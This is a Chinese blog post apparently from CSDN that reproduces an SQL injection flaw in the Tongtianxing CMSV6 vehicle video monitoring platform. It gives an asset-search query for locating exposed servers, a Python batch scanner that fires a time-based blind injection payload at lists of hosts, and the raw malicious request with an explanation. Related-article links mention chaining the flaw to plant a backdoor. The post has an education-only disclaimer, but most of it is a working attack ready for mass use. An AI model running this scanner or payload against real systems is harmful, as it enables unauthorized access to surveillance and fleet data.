【漏洞复现】通天星CMSV6车载视频监控平台 disable存在SQL注入

于 2024-07-26 00:15:00 发布
阅读量302 收藏 3
点赞数 4
分类专栏: 漏洞复现 文章标签: sql 数据库 网络 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54799594/article/details/140671565
版权

       声明:本文档或演示材料仅用于教育和教学目的。如果任何个人或组织利用本文档中的信息进行非法活动,将与本文档的作者或发布者无关。

一、漏洞描述

通天星CMSV6车载定位监控平台的研发团队专注于提供位置服务、无线3G/4G视频传输以及云存储服务,旨在为定位及无线视频终端产品打造强大的平台支持。该产品系统兼容多种设备,包括车载录像机、单兵录像机、网络监控摄像机以及行驶记录仪,构建了一个综合视频管理平台。但是,该平台的disable存在SQL注入漏洞,这一安全漏洞可能被恶意攻击者利用,通过向服务器上传恶意的后门文件来获取系统权限。

二、资产收集

1.使用网络空间测绘引擎搜索

鹰图检索:web.body="/808gps"

2.使用poc批量扫描

import requests
import argparse
import time

RED = '\033[91m'
RESET = '\033[0m'

# Function to check vulnerability
def check_vulnerability(url):
    try:
        # Construct the attack URL
        path = "/edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%284%29%29%29kOIi%29"
    
        full_url = url.rstrip('/') + path

        start_time = time.time()
        # Send the request
        response = requests.get(full_url, timeout=30)
        elapsed_time = time.time() - start_time
  
        if 4 <= elapsed_time < 6:
            print(f"{RED}URL [{url}] 可能存在通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞{RESET}")
        else:
            print(f"URL [{url}] 不存在漏洞")
    except requests.RequestException as e:
        print(f"URL [{url}] 请求失败: {e}")

# Main function to parse arguments and check vulnerability
def main():
    parser = argparse.ArgumentParser(description='检测目标地址是否存在通天星CMSV6车载视频监控平台 disable存在SQL注入漏洞')
    parser.add_argument('-u', '--url', help='指定目标地址')
    parser.add_argument('-f', '--file', help='指定包含目标地址的文本文件')

    args = parser.parse_args()

    if args.url:
        if not args.url.startswith("http://") and not args.url.startswith("https://"):
            args.url = "http://" + args.url
        check_vulnerability(args.url)
    elif args.file:
        with open(args.file, 'r') as file:
            urls = file.read().splitlines()
            for url in urls:
                if not url.startswith("http://") and not url.startswith("https://"):
                    url = "http://" + url
                check_vulnerability(url)

if __name__ == '__main__':
    main()

cmd运行:python poc.py -f host.txt

 随机寻找的幸运儿

三、漏洞复现 

1.构造数据包

构造数据包:


GET /edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29 HTTP/1.1
Host:

2.数据包分析 

这个数据包是一个HTTP请求,它包含了一些关键信息,如下所示:

  1. 请求方法:GET是HTTP协议中的一种请求方法,用于从服务器获取资源。

  2. 请求路径:/edu_security_officer/disable;downloadLogger.action?ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29这个路径包含了多个部分,其中"/edu_security_officer/disable"可能是一个特定的API端点,而后面的部分是一个SQL注入尝试。

  3. 查询参数:ids=1+AND+%28SELECT+2688+FROM+%28SELECT%28SLEEP%285%29%29%29kOIi%29这是一个查询字符串,包含了一些参数和值。在这个例子中,参数名为"ids",其值为"1 AND (SELECT 2688 FROM (SELECT(SLEEP(5)))kOIi)"。是一个SQL注入尝试,试图执行一个延时操作(SLEEP(5))。

  4. HTTP版本:HTTP/1.1这是HTTP协议的版本号,表示使用的是HTTP/1.1规范。

  5. Host头:Host:这个头字段指定了请求的目标主机名或IP地址。在这个例子中,没有提供具体的主机名或IP地址。

3.结束跑路

使用yakit Web Fuzzer构造数据包发送。

使用yakit Web Fuzzer构造数据包发送。sleep(3)延时3秒

每篇一言:在狂热思绪下喊出的爱情宣言中,存在着爱情的实体。

Cityミ slaves
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
漏洞通天CMSV6车载监控平台vehicleTTS SQL注入漏洞
晚风不及你
04-25 141
通天CMSV6车载视频监控平台StandardApiAction_vehicleTTS.action文件DevIDNO参数存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库信息。
漏洞通天CMSV6车载监控平台ids SQL注入漏洞
晚风不及你
04-25 106
通天CMSV6车载视频监控平台/run_stop/delete.do;downloadLogger.action文件ids参数存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库信息。
漏洞通天CMSV6车载定位监控平台 downloadLogger.action SQL注入漏洞
https://blog.echo234.cn/
03-25 504
通天CMSV6车载视频监控平台是东莞市通天软件科技有限公司研发的监控平台通天CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台通天科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天CMSV6车载定位监控平台ids接口处存在SQL注入漏洞,恶意攻击者可能会利用该漏洞获取敏感信息,从而导致服务器失陷。
漏洞通天CMSV6车载定位监控平台SQL注入致远程代码执行漏洞
Nday_Seeker
03-18 685
通天CMSV6车载定位监控平台/run_stop/delete.do;downloadLogger.action接口处未对用户的输入进行有效的过滤,存在SQL注入漏洞,攻击者可通过漏洞获取敏感信息,获取系统权限。
通天CMSV6车载视频监控平台 disable存在SQL注入漏洞
xiaokp7的博客
07-24 155
通天CMSV6车载视频监控平台是东莞市通天软件科技有限公司研发的监控平台通天CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台通天科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控,还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。
漏洞通天CMSV6车载定位监控平台 disable SQL注入漏洞
siu~
07-25 331
漏洞是由于通天CMSV6车载定位监控平台 /edu_security_officer/disable接口处未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出SQL注入漏洞。该漏洞可配合任意文件读取获取网站绝对路径写入后门文件进行远程代码执行。
漏洞通天CMSV6车载监控平台SQL注入漏洞
晚风不及你
01-05 761
深圳市通天科技有限公司,是一家以从事计算机、通信和其他电子设备制造业为主的企业。通天车载视频监控平台软件拥有多种语言版本。应用于公交车车载视频监控、校车车载视频监控、大巴车车载视频监控、物流车载监控、油品运输车载监控、警车车载视频监控等公共交通上。
通天CMSV6车载定位监控平台 SQL注入漏洞(含nuclei-poc)
m0_50797689的博客
03-18 397
通天CMSV6车载定位监控平台 SQL注入漏洞(含nuclei-poc)
漏洞通天CMSV6车载定位监控平台 disable SQL注入漏洞
最新发布
qq_39894062的博客
07-25 101
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
CSZ CMS 1.2.X sql注入漏洞
09-07
# (CVE-2019-13086)CSZ CMS 1.2.Xsql注入漏洞 ## 一、漏洞简介 CSZ CMS是一套基于PHP的开源内容管理系统(CMS)。 CSZ CMS 1.2.X版本(2019-06-20之前)中的core/MY_Security.php文件存在SQL注入漏洞。该漏洞...
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
在极致CMS中,我们发了多个SQL注入漏洞,这些漏洞可以让攻击者轻松地访问或修改数据库中的数据。 例如,在FrPHP/lib/Controller.php文件中的frparam()函数中,我们发了一个SQL注入漏洞。该函数用于获取URL参数...
S-CMS PHP v30存在SQL注入漏洞1
08-03
本文将深入探讨S-CMS PHP v3.0中存在SQL注入漏洞(CVE-2019-12860),这是一个严重影响系统安全性的缺陷。SQL注入是一种常见的网络安全攻击方式,攻击者通过在输入字段中插入恶意SQL代码来操纵数据库,获取敏感...
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL 注入漏洞后台 本节将对 74CMS 3.0 SQL 注入漏洞后台进行详细分析,首先介绍了攻击环境的搭建,然后对代码进行了详细的审计,最后对漏洞进行了分析。 一、搭建攻击环境 为了进行攻击,我们需要搭建...
答疑存在sql注入的php168cms
08-15
描述中提到"可sqlmap跑数据库",这表明攻击者可以利用自动化工具如sqlmap来探测和利用这个SQL注入漏洞Sqlmap是一个强大的渗透测试工具,能够自动检测、利用SQL注入漏洞,并对目标数据库进行枚举、数据提取甚至完全...
SQL Server开发新纪元:用SQL Server Data Tools (SSDT) 打造数据库
2401_85341950的博客
07-20 1024
SSDT 是一个基于Visual Studio的开发工具,它集成了对SQL Server数据库项目的支持。SSDT 提供了可视化的设计界面,以及对数据库版本控制和自动化测试的支持。
SQL执行流程、SQL执行计划、SQL优化
风中的默默
07-19 460
返回两个表中的匹配行。返回左表中的所有记录以及右表中的匹配记录。返回右表中的所有记录以及左表中的匹配记录。返回左侧或右侧表中有匹配的所有记录。
【MySQL】根据binlog日志获取回滚sql的一个开发思路
weixin_45385457的博客
07-19 527
不同客户端之间会交替追加在 binlog 中,需要通过 👆的 binlog 匹配流程来控制匹配。行,需要再次寻找 thread_id 相同的行,匹配到后执行上一个流程。在 binlog 中的线程 ID 记录为 thread_id。一个线程执行多个 sql 回滚到同一个文件可能带来的问题。对应 binlog 日志中的 thread_id=指定 mysql 客户端 开始时间和结束时间。打开 mysql 客户端 开始时间。关闭 mysql 客户端 结束时间。先匹配 thread_id 相同的。
SQL Server报告服务的艺术:在SSRS中打造专业报告
2401_85760095的博客
07-20 1027
SQL Server Reporting Services是一个全面的报告解决方案,它允许从各种数据源生成杂的交互式和移动友好的报告。SSRS包括一个集成的开发环境,用于设计报告,以及一个部署环境,用于发布和共享报告。
cmsv6 sql注入漏洞
04-26
CMSv6是一个广泛使用的内容管理系统,而SQL注入漏洞是一种常见的Web应用程序漏洞。当Web应用程序没有正确过滤用户输入或使用不安全的查询方法时,攻击者可以利用SQL注入漏洞向数据库发送恶意的SQL代码,从而获取、修改或删除数据库中的数据。 CMSv6的SQL注入漏洞可能导致以下风险: 1. 数据泄露:攻击者可以通过注入恶意的SQL代码来获取数据库中的敏感信息,如用户账号、密码等。 2. 数据篡改:攻击者可以修改数据库中的数据,包括修改用户信息、文章内容等。 3. 数据删除:攻击者可以通过注入删除语句删除数据库中的数据,导致数据的不可恢性损失。 为了防止SQL注入漏洞,开发者应该采取以下措施: 1. 使用参数化查询或预编译语句来处理用户输入,确保输入数据经过正确的转义和过滤。 2. 对于动态生成的SQL查询,避免直接拼接用户输入到查询语句中,而是使用参数化查询。 3. 限制数据库用户的权限,确保数据库用户只能执行必要的操作,并且不允许直接执行危险的SQL语句。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cityミ slaves

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值